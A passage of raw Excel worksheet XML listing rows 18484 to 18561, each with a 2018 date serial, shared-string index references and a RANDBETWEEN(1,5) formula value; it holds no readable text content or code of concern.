        <v>43164.010428240741</v>
      </c>
      <c r="C18484" t="s">
        <v>10</v>
      </c>
      <c r="D18484" t="s">
        <v>36</v>
      </c>
      <c r="E18484" s="2" t="s">
        <v>16556</v>
      </c>
      <c r="F18484">
        <f t="shared" ca="1" si="288"/>
        <v>2</v>
      </c>
    </row>
    <row r="18485" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18485" s="1">
        <v>43163.961168981485</v>
      </c>
      <c r="C18485" t="s">
        <v>253</v>
      </c>
      <c r="E18485" t="s">
        <v>16557</v>
      </c>
      <c r="F18485">
        <f t="shared" ca="1" si="288"/>
        <v>1</v>
      </c>
    </row>
    <row r="18486" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18486" s="1">
        <v>43163.923263888886</v>
      </c>
      <c r="C18486" t="s">
        <v>73</v>
      </c>
      <c r="E18486" t="s">
        <v>16558</v>
      </c>
      <c r="F18486">
        <f t="shared" ca="1" si="288"/>
        <v>5</v>
      </c>
    </row>
    <row r="18487" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18487" s="1">
        <v>43163.8981712963</v>
      </c>
      <c r="C18487" t="s">
        <v>314</v>
      </c>
      <c r="E18487" t="s">
        <v>16559</v>
      </c>
      <c r="F18487">
        <f t="shared" ca="1" si="288"/>
        <v>5</v>
      </c>
    </row>
    <row r="18488" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18488" s="1">
        <v>43163.887106481481</v>
      </c>
      <c r="C18488" t="s">
        <v>139</v>
      </c>
      <c r="E18488" t="s">
        <v>16560</v>
      </c>
      <c r="F18488">
        <f t="shared" ca="1" si="288"/>
        <v>3</v>
      </c>
    </row>
    <row r="18489" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A18489" s="1">
        <v>43163.884050925924</v>
      </c>
      <c r="C18489" t="s">
        <v>73</v>
      </c>
      <c r="E18489" s="2" t="s">
        <v>16561</v>
      </c>
      <c r="F18489">
        <f t="shared" ca="1" si="288"/>
        <v>3</v>
      </c>
    </row>
    <row r="18490" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A18490" s="1">
        <v>43163.858726851853</v>
      </c>
      <c r="C18490" t="s">
        <v>82</v>
      </c>
      <c r="E18490" s="2" t="s">
        <v>16562</v>
      </c>
      <c r="F18490">
        <f t="shared" ca="1" si="288"/>
        <v>5</v>
      </c>
    </row>
    <row r="18491" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18491" s="1">
        <v>43163.813067129631</v>
      </c>
      <c r="C18491" t="s">
        <v>144</v>
      </c>
      <c r="E18491" t="s">
        <v>16563</v>
      </c>
      <c r="F18491">
        <f t="shared" ca="1" si="288"/>
        <v>1</v>
      </c>
    </row>
    <row r="18492" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18492" s="1">
        <v>43163.773402777777</v>
      </c>
      <c r="C18492" t="s">
        <v>73</v>
      </c>
      <c r="E18492" t="s">
        <v>16564</v>
      </c>
      <c r="F18492">
        <f t="shared" ca="1" si="288"/>
        <v>2</v>
      </c>
    </row>
    <row r="18493" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18493" s="1">
        <v>43163.750358796293</v>
      </c>
      <c r="C18493" t="s">
        <v>497</v>
      </c>
      <c r="E18493" t="s">
        <v>16565</v>
      </c>
      <c r="F18493">
        <f t="shared" ca="1" si="288"/>
        <v>5</v>
      </c>
    </row>
    <row r="18494" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18494" s="1">
        <v>43163.740416666667</v>
      </c>
      <c r="C18494" t="s">
        <v>1611</v>
      </c>
      <c r="D18494" t="s">
        <v>192</v>
      </c>
      <c r="E18494" s="2" t="s">
        <v>16566</v>
      </c>
      <c r="F18494">
        <f t="shared" ca="1" si="288"/>
        <v>3</v>
      </c>
    </row>
    <row r="18495" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A18495" s="1">
        <v>43163.734548611108</v>
      </c>
      <c r="C18495" t="s">
        <v>258</v>
      </c>
      <c r="D18495" t="s">
        <v>263</v>
      </c>
      <c r="E18495" s="2" t="s">
        <v>16567</v>
      </c>
      <c r="F18495">
        <f t="shared" ca="1" si="288"/>
        <v>1</v>
      </c>
    </row>
    <row r="18496" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18496" s="1">
        <v>43163.602418981478</v>
      </c>
      <c r="C18496" t="s">
        <v>1611</v>
      </c>
      <c r="D18496" t="s">
        <v>1056</v>
      </c>
      <c r="E18496" s="2" t="s">
        <v>16568</v>
      </c>
      <c r="F18496">
        <f t="shared" ca="1" si="288"/>
        <v>5</v>
      </c>
    </row>
    <row r="18497" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A18497" s="1">
        <v>43163.587743055556</v>
      </c>
      <c r="C18497" t="s">
        <v>8364</v>
      </c>
      <c r="D18497" t="s">
        <v>163</v>
      </c>
      <c r="E18497" s="2" t="s">
        <v>16569</v>
      </c>
      <c r="F18497">
        <f t="shared" ca="1" si="288"/>
        <v>5</v>
      </c>
    </row>
    <row r="18498" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18498" s="1">
        <v>43163.541747685187</v>
      </c>
      <c r="C18498" t="s">
        <v>461</v>
      </c>
      <c r="F18498">
        <f t="shared" ref="F18498:F18561" ca="1" si="289">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="18499" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18499" s="1">
        <v>43163.466736111113</v>
      </c>
      <c r="C18499" t="s">
        <v>41</v>
      </c>
      <c r="E18499" t="s">
        <v>16570</v>
      </c>
      <c r="F18499">
        <f t="shared" ca="1" si="289"/>
        <v>3</v>
      </c>
    </row>
    <row r="18500" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18500" s="1">
        <v>43163.458506944444</v>
      </c>
      <c r="C18500" t="s">
        <v>97</v>
      </c>
      <c r="F18500">
        <f t="shared" ca="1" si="289"/>
        <v>5</v>
      </c>
    </row>
    <row r="18501" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18501" s="1">
        <v>43163.368333333332</v>
      </c>
      <c r="C18501" t="s">
        <v>97</v>
      </c>
      <c r="E18501" t="s">
        <v>3499</v>
      </c>
      <c r="F18501">
        <f t="shared" ca="1" si="289"/>
        <v>5</v>
      </c>
    </row>
    <row r="18502" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A18502" s="1">
        <v>43163.367986111109</v>
      </c>
      <c r="C18502" t="s">
        <v>71</v>
      </c>
      <c r="E18502" s="2" t="s">
        <v>16571</v>
      </c>
      <c r="F18502">
        <f t="shared" ca="1" si="289"/>
        <v>3</v>
      </c>
    </row>
    <row r="18503" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18503" s="1">
        <v>43163.363981481481</v>
      </c>
      <c r="C18503" t="s">
        <v>71</v>
      </c>
      <c r="E18503" t="s">
        <v>16572</v>
      </c>
      <c r="F18503">
        <f t="shared" ca="1" si="289"/>
        <v>4</v>
      </c>
    </row>
    <row r="18504" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18504" s="1">
        <v>43163.280405092592</v>
      </c>
      <c r="C18504" t="s">
        <v>41</v>
      </c>
      <c r="E18504" t="s">
        <v>16573</v>
      </c>
      <c r="F18504">
        <f t="shared" ca="1" si="289"/>
        <v>3</v>
      </c>
    </row>
    <row r="18505" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A18505" s="1">
        <v>43163.249942129631</v>
      </c>
      <c r="C18505" t="s">
        <v>41</v>
      </c>
      <c r="E18505" s="2" t="s">
        <v>16574</v>
      </c>
      <c r="F18505">
        <f t="shared" ca="1" si="289"/>
        <v>2</v>
      </c>
    </row>
    <row r="18506" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18506" s="1">
        <v>43163.138784722221</v>
      </c>
      <c r="C18506" t="s">
        <v>17</v>
      </c>
      <c r="E18506" t="s">
        <v>16575</v>
      </c>
      <c r="F18506">
        <f t="shared" ca="1" si="289"/>
        <v>3</v>
      </c>
    </row>
    <row r="18507" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18507" s="1">
        <v>43163.115567129629</v>
      </c>
      <c r="C18507" t="s">
        <v>41</v>
      </c>
      <c r="E18507" t="s">
        <v>16576</v>
      </c>
      <c r="F18507">
        <f t="shared" ca="1" si="289"/>
        <v>3</v>
      </c>
    </row>
    <row r="18508" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A18508" s="1">
        <v>43163.08966435185</v>
      </c>
      <c r="C18508" t="s">
        <v>41</v>
      </c>
      <c r="E18508" s="2" t="s">
        <v>16577</v>
      </c>
      <c r="F18508">
        <f t="shared" ca="1" si="289"/>
        <v>1</v>
      </c>
    </row>
    <row r="18509" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18509" s="1">
        <v>43163.073692129627</v>
      </c>
      <c r="C18509" t="s">
        <v>318</v>
      </c>
      <c r="E18509" t="s">
        <v>16578</v>
      </c>
      <c r="F18509">
        <f t="shared" ca="1" si="289"/>
        <v>4</v>
      </c>
    </row>
    <row r="18510" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18510" s="1">
        <v>43162.845057870371</v>
      </c>
      <c r="C18510" t="s">
        <v>6</v>
      </c>
      <c r="D18510" t="s">
        <v>25</v>
      </c>
      <c r="E18510" t="s">
        <v>16579</v>
      </c>
      <c r="F18510">
        <f t="shared" ca="1" si="289"/>
        <v>3</v>
      </c>
    </row>
    <row r="18511" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18511" s="1">
        <v>43162.737604166665</v>
      </c>
      <c r="C18511" t="s">
        <v>477</v>
      </c>
      <c r="D18511" t="s">
        <v>1091</v>
      </c>
      <c r="E18511" s="2" t="s">
        <v>16580</v>
      </c>
      <c r="F18511">
        <f t="shared" ca="1" si="289"/>
        <v>5</v>
      </c>
    </row>
    <row r="18512" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18512" s="1">
        <v>43162.525671296295</v>
      </c>
      <c r="C18512" t="s">
        <v>1080</v>
      </c>
      <c r="D18512" t="s">
        <v>52</v>
      </c>
      <c r="E18512" s="2" t="s">
        <v>16581</v>
      </c>
      <c r="F18512">
        <f t="shared" ca="1" si="289"/>
        <v>5</v>
      </c>
    </row>
    <row r="18513" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A18513" s="1">
        <v>43162.468611111108</v>
      </c>
      <c r="C18513" t="s">
        <v>1194</v>
      </c>
      <c r="D18513" t="s">
        <v>112</v>
      </c>
      <c r="E18513" s="2" t="s">
        <v>16582</v>
      </c>
      <c r="F18513">
        <f t="shared" ca="1" si="289"/>
        <v>4</v>
      </c>
    </row>
    <row r="18514" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A18514" s="1">
        <v>43162.464143518519</v>
      </c>
      <c r="C18514" t="s">
        <v>6</v>
      </c>
      <c r="D18514" t="s">
        <v>25</v>
      </c>
      <c r="E18514" s="2" t="s">
        <v>16583</v>
      </c>
      <c r="F18514">
        <f t="shared" ca="1" si="289"/>
        <v>2</v>
      </c>
    </row>
    <row r="18515" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A18515" s="1">
        <v>43162.373379629629</v>
      </c>
      <c r="C18515" t="s">
        <v>454</v>
      </c>
      <c r="D18515" t="s">
        <v>1056</v>
      </c>
      <c r="E18515" s="2" t="s">
        <v>16584</v>
      </c>
      <c r="F18515">
        <f t="shared" ca="1" si="289"/>
        <v>1</v>
      </c>
    </row>
    <row r="18516" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18516" s="1">
        <v>43162.289733796293</v>
      </c>
      <c r="C18516" t="s">
        <v>41</v>
      </c>
      <c r="E18516" s="2" t="s">
        <v>16585</v>
      </c>
      <c r="F18516">
        <f t="shared" ca="1" si="289"/>
        <v>4</v>
      </c>
    </row>
    <row r="18517" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A18517" s="1">
        <v>43162.180150462962</v>
      </c>
      <c r="C18517" t="s">
        <v>10</v>
      </c>
      <c r="D18517" t="s">
        <v>36</v>
      </c>
      <c r="E18517" s="2" t="s">
        <v>16586</v>
      </c>
      <c r="F18517">
        <f t="shared" ca="1" si="289"/>
        <v>5</v>
      </c>
    </row>
    <row r="18518" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18518" s="1">
        <v>43162.136967592596</v>
      </c>
      <c r="C18518" t="s">
        <v>1080</v>
      </c>
      <c r="D18518" t="s">
        <v>821</v>
      </c>
      <c r="E18518" s="2" t="s">
        <v>16587</v>
      </c>
      <c r="F18518">
        <f t="shared" ca="1" si="289"/>
        <v>2</v>
      </c>
    </row>
    <row r="18519" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18519" s="1">
        <v>43162.062615740739</v>
      </c>
      <c r="C18519" t="s">
        <v>8808</v>
      </c>
      <c r="D18519" t="s">
        <v>158</v>
      </c>
      <c r="E18519" t="s">
        <v>16588</v>
      </c>
      <c r="F18519">
        <f t="shared" ca="1" si="289"/>
        <v>3</v>
      </c>
    </row>
    <row r="18520" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18520" s="1">
        <v>43162.062581018516</v>
      </c>
      <c r="C18520" t="s">
        <v>8808</v>
      </c>
      <c r="D18520" t="s">
        <v>2214</v>
      </c>
      <c r="E18520" t="s">
        <v>16589</v>
      </c>
      <c r="F18520">
        <f t="shared" ca="1" si="289"/>
        <v>2</v>
      </c>
    </row>
    <row r="18521" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18521" s="1">
        <v>43161.90662037037</v>
      </c>
      <c r="C18521" t="s">
        <v>1080</v>
      </c>
      <c r="D18521" t="s">
        <v>158</v>
      </c>
      <c r="E18521" s="2" t="s">
        <v>16590</v>
      </c>
      <c r="F18521">
        <f t="shared" ca="1" si="289"/>
        <v>3</v>
      </c>
    </row>
    <row r="18522" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18522" s="1">
        <v>43161.870891203704</v>
      </c>
      <c r="C18522" t="s">
        <v>1080</v>
      </c>
      <c r="D18522" t="s">
        <v>7</v>
      </c>
      <c r="E18522" s="2" t="s">
        <v>16590</v>
      </c>
      <c r="F18522">
        <f t="shared" ca="1" si="289"/>
        <v>5</v>
      </c>
    </row>
    <row r="18523" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18523" s="1">
        <v>43161.859629629631</v>
      </c>
      <c r="C18523" t="s">
        <v>1080</v>
      </c>
      <c r="D18523" t="s">
        <v>290</v>
      </c>
      <c r="E18523" s="2" t="s">
        <v>16591</v>
      </c>
      <c r="F18523">
        <f t="shared" ca="1" si="289"/>
        <v>3</v>
      </c>
    </row>
    <row r="18524" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18524" s="1">
        <v>43161.801261574074</v>
      </c>
      <c r="C18524" t="s">
        <v>477</v>
      </c>
      <c r="D18524" t="s">
        <v>46</v>
      </c>
      <c r="E18524" s="2" t="s">
        <v>16592</v>
      </c>
      <c r="F18524">
        <f t="shared" ca="1" si="289"/>
        <v>4</v>
      </c>
    </row>
    <row r="18525" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18525" s="1">
        <v>43161.762743055559</v>
      </c>
      <c r="C18525" t="s">
        <v>1080</v>
      </c>
      <c r="D18525" t="s">
        <v>290</v>
      </c>
      <c r="E18525" s="2" t="s">
        <v>16593</v>
      </c>
      <c r="F18525">
        <f t="shared" ca="1" si="289"/>
        <v>4</v>
      </c>
    </row>
    <row r="18526" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18526" s="1">
        <v>43161.755925925929</v>
      </c>
      <c r="C18526" t="s">
        <v>10</v>
      </c>
      <c r="D18526" t="s">
        <v>6</v>
      </c>
      <c r="E18526" t="s">
        <v>16594</v>
      </c>
      <c r="F18526">
        <f t="shared" ca="1" si="289"/>
        <v>5</v>
      </c>
    </row>
    <row r="18527" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18527" s="1">
        <v>43161.713865740741</v>
      </c>
      <c r="C18527" t="s">
        <v>10</v>
      </c>
      <c r="D18527" t="s">
        <v>158</v>
      </c>
      <c r="E18527" t="s">
        <v>16595</v>
      </c>
      <c r="F18527">
        <f t="shared" ca="1" si="289"/>
        <v>3</v>
      </c>
    </row>
    <row r="18528" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18528" s="1">
        <v>43161.71361111111</v>
      </c>
      <c r="C18528" t="s">
        <v>6</v>
      </c>
      <c r="D18528" t="s">
        <v>114</v>
      </c>
      <c r="E18528" t="s">
        <v>16596</v>
      </c>
      <c r="F18528">
        <f t="shared" ca="1" si="289"/>
        <v>1</v>
      </c>
    </row>
    <row r="18529" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18529" s="1">
        <v>43161.703900462962</v>
      </c>
      <c r="C18529" t="s">
        <v>10</v>
      </c>
      <c r="D18529" t="s">
        <v>374</v>
      </c>
      <c r="E18529" t="s">
        <v>16597</v>
      </c>
      <c r="F18529">
        <f t="shared" ca="1" si="289"/>
        <v>4</v>
      </c>
    </row>
    <row r="18530" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18530" s="1">
        <v>43161.689745370371</v>
      </c>
      <c r="C18530" t="s">
        <v>477</v>
      </c>
      <c r="D18530" t="s">
        <v>330</v>
      </c>
      <c r="E18530" s="2" t="s">
        <v>16598</v>
      </c>
      <c r="F18530">
        <f t="shared" ca="1" si="289"/>
        <v>5</v>
      </c>
    </row>
    <row r="18531" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18531" s="1">
        <v>43161.642337962963</v>
      </c>
      <c r="C18531" t="s">
        <v>10</v>
      </c>
      <c r="D18531" t="s">
        <v>89</v>
      </c>
      <c r="E18531" t="s">
        <v>16599</v>
      </c>
      <c r="F18531">
        <f t="shared" ca="1" si="289"/>
        <v>4</v>
      </c>
    </row>
    <row r="18532" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A18532" s="1">
        <v>43161.636516203704</v>
      </c>
      <c r="C18532" t="s">
        <v>173</v>
      </c>
      <c r="E18532" s="2" t="s">
        <v>16600</v>
      </c>
      <c r="F18532">
        <f t="shared" ca="1" si="289"/>
        <v>3</v>
      </c>
    </row>
    <row r="18533" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A18533" s="1">
        <v>43161.63490740741</v>
      </c>
      <c r="C18533" t="s">
        <v>10</v>
      </c>
      <c r="D18533" t="s">
        <v>11</v>
      </c>
      <c r="E18533" s="2" t="s">
        <v>16601</v>
      </c>
      <c r="F18533">
        <f t="shared" ca="1" si="289"/>
        <v>2</v>
      </c>
    </row>
    <row r="18534" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18534" s="1">
        <v>43161.624328703707</v>
      </c>
      <c r="C18534" t="s">
        <v>10</v>
      </c>
      <c r="D18534" t="s">
        <v>6</v>
      </c>
      <c r="E18534" t="s">
        <v>16602</v>
      </c>
      <c r="F18534">
        <f t="shared" ca="1" si="289"/>
        <v>3</v>
      </c>
    </row>
    <row r="18535" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A18535" s="1">
        <v>43161.614085648151</v>
      </c>
      <c r="C18535" t="s">
        <v>10</v>
      </c>
      <c r="D18535" t="s">
        <v>86</v>
      </c>
      <c r="E18535" s="2" t="s">
        <v>16603</v>
      </c>
      <c r="F18535">
        <f t="shared" ca="1" si="289"/>
        <v>1</v>
      </c>
    </row>
    <row r="18536" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18536" s="1">
        <v>43161.603437500002</v>
      </c>
      <c r="C18536" t="s">
        <v>10</v>
      </c>
      <c r="D18536" t="s">
        <v>89</v>
      </c>
      <c r="E18536" t="s">
        <v>16604</v>
      </c>
      <c r="F18536">
        <f t="shared" ca="1" si="289"/>
        <v>2</v>
      </c>
    </row>
    <row r="18537" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A18537" s="1">
        <v>43161.586053240739</v>
      </c>
      <c r="C18537" t="s">
        <v>10</v>
      </c>
      <c r="D18537" t="s">
        <v>36</v>
      </c>
      <c r="E18537" s="2" t="s">
        <v>16605</v>
      </c>
      <c r="F18537">
        <f t="shared" ca="1" si="289"/>
        <v>3</v>
      </c>
    </row>
    <row r="18538" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18538" s="1">
        <v>43161.58252314815</v>
      </c>
      <c r="C18538" t="s">
        <v>48</v>
      </c>
      <c r="E18538" t="s">
        <v>16606</v>
      </c>
      <c r="F18538">
        <f t="shared" ca="1" si="289"/>
        <v>3</v>
      </c>
    </row>
    <row r="18539" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A18539" s="1">
        <v>43161.5778587963</v>
      </c>
      <c r="C18539" t="s">
        <v>260</v>
      </c>
      <c r="E18539" s="2" t="s">
        <v>16607</v>
      </c>
      <c r="F18539">
        <f t="shared" ca="1" si="289"/>
        <v>3</v>
      </c>
    </row>
    <row r="18540" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18540" s="1">
        <v>43161.564826388887</v>
      </c>
      <c r="C18540" t="s">
        <v>173</v>
      </c>
      <c r="E18540" s="2" t="s">
        <v>16608</v>
      </c>
      <c r="F18540">
        <f t="shared" ca="1" si="289"/>
        <v>5</v>
      </c>
    </row>
    <row r="18541" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18541" s="1">
        <v>43161.5624537037</v>
      </c>
      <c r="C18541" t="s">
        <v>477</v>
      </c>
      <c r="D18541" t="s">
        <v>602</v>
      </c>
      <c r="E18541" s="2" t="s">
        <v>16609</v>
      </c>
      <c r="F18541">
        <f t="shared" ca="1" si="289"/>
        <v>5</v>
      </c>
    </row>
    <row r="18542" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18542" s="1">
        <v>43161.542731481481</v>
      </c>
      <c r="C18542" t="s">
        <v>10</v>
      </c>
      <c r="D18542" t="s">
        <v>6</v>
      </c>
      <c r="E18542" t="s">
        <v>16610</v>
      </c>
      <c r="F18542">
        <f t="shared" ca="1" si="289"/>
        <v>5</v>
      </c>
    </row>
    <row r="18543" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A18543" s="1">
        <v>43161.532326388886</v>
      </c>
      <c r="C18543" t="s">
        <v>10</v>
      </c>
      <c r="D18543" t="s">
        <v>17</v>
      </c>
      <c r="E18543" s="2" t="s">
        <v>16611</v>
      </c>
      <c r="F18543">
        <f t="shared" ca="1" si="289"/>
        <v>1</v>
      </c>
    </row>
    <row r="18544" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18544" s="1">
        <v>43161.517337962963</v>
      </c>
      <c r="C18544" t="s">
        <v>10</v>
      </c>
      <c r="D18544" t="s">
        <v>36</v>
      </c>
      <c r="E18544" t="s">
        <v>16612</v>
      </c>
      <c r="F18544">
        <f t="shared" ca="1" si="289"/>
        <v>3</v>
      </c>
    </row>
    <row r="18545" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18545" s="1">
        <v>43161.515243055554</v>
      </c>
      <c r="C18545" t="s">
        <v>10</v>
      </c>
      <c r="D18545" t="s">
        <v>17</v>
      </c>
      <c r="E18545" t="s">
        <v>16613</v>
      </c>
      <c r="F18545">
        <f t="shared" ca="1" si="289"/>
        <v>5</v>
      </c>
    </row>
    <row r="18546" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18546" s="1">
        <v>43161.511064814818</v>
      </c>
      <c r="C18546" t="s">
        <v>10</v>
      </c>
      <c r="D18546" t="s">
        <v>1036</v>
      </c>
      <c r="E18546" t="s">
        <v>16614</v>
      </c>
      <c r="F18546">
        <f t="shared" ca="1" si="289"/>
        <v>1</v>
      </c>
    </row>
    <row r="18547" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18547" s="1">
        <v>43161.479386574072</v>
      </c>
      <c r="C18547" t="s">
        <v>10</v>
      </c>
      <c r="D18547" t="s">
        <v>23</v>
      </c>
      <c r="E18547" t="s">
        <v>16615</v>
      </c>
      <c r="F18547">
        <f t="shared" ca="1" si="289"/>
        <v>1</v>
      </c>
    </row>
    <row r="18548" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A18548" s="1">
        <v>43161.471539351849</v>
      </c>
      <c r="C18548" t="s">
        <v>10</v>
      </c>
      <c r="D18548" t="s">
        <v>17</v>
      </c>
      <c r="E18548" s="2" t="s">
        <v>16616</v>
      </c>
      <c r="F18548">
        <f t="shared" ca="1" si="289"/>
        <v>5</v>
      </c>
    </row>
    <row r="18549" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18549" s="1">
        <v>43161.437534722223</v>
      </c>
      <c r="C18549" t="s">
        <v>10</v>
      </c>
      <c r="D18549" t="s">
        <v>89</v>
      </c>
      <c r="E18549" t="s">
        <v>16617</v>
      </c>
      <c r="F18549">
        <f t="shared" ca="1" si="289"/>
        <v>4</v>
      </c>
    </row>
    <row r="18550" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18550" s="1">
        <v>43161.436469907407</v>
      </c>
      <c r="C18550" t="s">
        <v>10</v>
      </c>
      <c r="D18550" t="s">
        <v>494</v>
      </c>
      <c r="E18550" s="2" t="s">
        <v>16618</v>
      </c>
      <c r="F18550">
        <f t="shared" ca="1" si="289"/>
        <v>5</v>
      </c>
    </row>
    <row r="18551" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18551" s="1">
        <v>43161.416851851849</v>
      </c>
      <c r="C18551" t="s">
        <v>10</v>
      </c>
      <c r="D18551" t="s">
        <v>36</v>
      </c>
      <c r="E18551" t="s">
        <v>16619</v>
      </c>
      <c r="F18551">
        <f t="shared" ca="1" si="289"/>
        <v>1</v>
      </c>
    </row>
    <row r="18552" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18552" s="1">
        <v>43161.415034722224</v>
      </c>
      <c r="C18552" t="s">
        <v>10</v>
      </c>
      <c r="D18552" t="s">
        <v>271</v>
      </c>
      <c r="E18552" t="s">
        <v>16620</v>
      </c>
      <c r="F18552">
        <f t="shared" ca="1" si="289"/>
        <v>3</v>
      </c>
    </row>
    <row r="18553" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18553" s="1">
        <v>43161.401516203703</v>
      </c>
      <c r="C18553" t="s">
        <v>10</v>
      </c>
      <c r="D18553" t="s">
        <v>271</v>
      </c>
      <c r="E18553" t="s">
        <v>16621</v>
      </c>
      <c r="F18553">
        <f t="shared" ca="1" si="289"/>
        <v>4</v>
      </c>
    </row>
    <row r="18554" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18554" s="1">
        <v>43161.396979166668</v>
      </c>
      <c r="C18554" t="s">
        <v>10</v>
      </c>
      <c r="D18554" t="s">
        <v>33</v>
      </c>
      <c r="E18554" t="s">
        <v>16622</v>
      </c>
      <c r="F18554">
        <f t="shared" ca="1" si="289"/>
        <v>2</v>
      </c>
    </row>
    <row r="18555" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18555" s="1">
        <v>43161.392071759263</v>
      </c>
      <c r="C18555" t="s">
        <v>6</v>
      </c>
      <c r="D18555" t="s">
        <v>25</v>
      </c>
      <c r="E18555" t="s">
        <v>16623</v>
      </c>
      <c r="F18555">
        <f t="shared" ca="1" si="289"/>
        <v>1</v>
      </c>
    </row>
    <row r="18556" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A18556" s="1">
        <v>43161.362013888887</v>
      </c>
      <c r="C18556" t="s">
        <v>10</v>
      </c>
      <c r="E18556" s="2" t="s">
        <v>16624</v>
      </c>
      <c r="F18556">
        <f t="shared" ca="1" si="289"/>
        <v>4</v>
      </c>
    </row>
    <row r="18557" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A18557" s="1">
        <v>43161.355879629627</v>
      </c>
      <c r="C18557" t="s">
        <v>43</v>
      </c>
      <c r="D18557" t="s">
        <v>312</v>
      </c>
      <c r="E18557" s="2" t="s">
        <v>16625</v>
      </c>
      <c r="F18557">
        <f t="shared" ca="1" si="289"/>
        <v>4</v>
      </c>
    </row>
    <row r="18558" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A18558" s="1">
        <v>43161.348761574074</v>
      </c>
      <c r="C18558" t="s">
        <v>10</v>
      </c>
      <c r="D18558" t="s">
        <v>271</v>
      </c>
      <c r="E18558" s="2" t="s">
        <v>16626</v>
      </c>
      <c r="F18558">
        <f t="shared" ca="1" si="289"/>
        <v>2</v>
      </c>
    </row>
    <row r="18559" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18559" s="1">
        <v>43161.337997685187</v>
      </c>
      <c r="C18559" t="s">
        <v>477</v>
      </c>
      <c r="D18559" t="s">
        <v>1160</v>
      </c>
      <c r="E18559" s="2" t="s">
        <v>16627</v>
      </c>
      <c r="F18559">
        <f t="shared" ca="1" si="289"/>
        <v>5</v>
      </c>
    </row>
    <row r="18560" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A18560" s="1">
        <v>43161.319189814814</v>
      </c>
      <c r="C18560" t="s">
        <v>124</v>
      </c>
      <c r="E18560" s="2" t="s">
        <v>16628</v>
      </c>
      <c r="F18560">
        <f t="shared" ca="1" si="289"/>
        <v>5</v>
      </c>
    </row>
    <row r="18561" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18561" s="1">
        <v>43161.293564814812</v>
      </c>
      <c r="C18561" t="s">
        <v>103</v>
      </c>
      <c r="E18561" t="s">
        <v>16629</v>
      </c>
      <c r="F18561">
        <f t="shared" ca="1" si="289"/>
        <v>3</v>
      </c>
    </row>
